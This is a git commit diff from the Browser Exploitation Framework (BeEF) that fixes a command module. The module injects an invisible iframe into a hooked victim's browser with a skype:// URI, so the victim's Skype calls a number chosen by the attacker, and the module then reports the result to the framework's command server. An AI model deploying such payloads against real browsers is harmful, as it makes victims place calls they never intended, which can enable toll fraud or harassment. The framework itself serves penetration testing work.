issue 269: corrected the skype handler. Now works great on Firefox and Chrome. Still don't work on Safari.

git-svn-id: https://beef.googlecode.com/svn/trunk@792 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
antisnatchor
2011-03-14 10:31:57 +00:00
parent d1bc5f8eef
commit a49f46c681

View File

@@ -1,5 +1,5 @@
beef.execute(function() {
var sploit = beef.dom.createInvisibleIframe();
sploit.src = 'skype:<%= @tel_num %>?cal';
sploit.src = 'skype://<%= @tel_num %>?call';
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=IFrame Created!");
});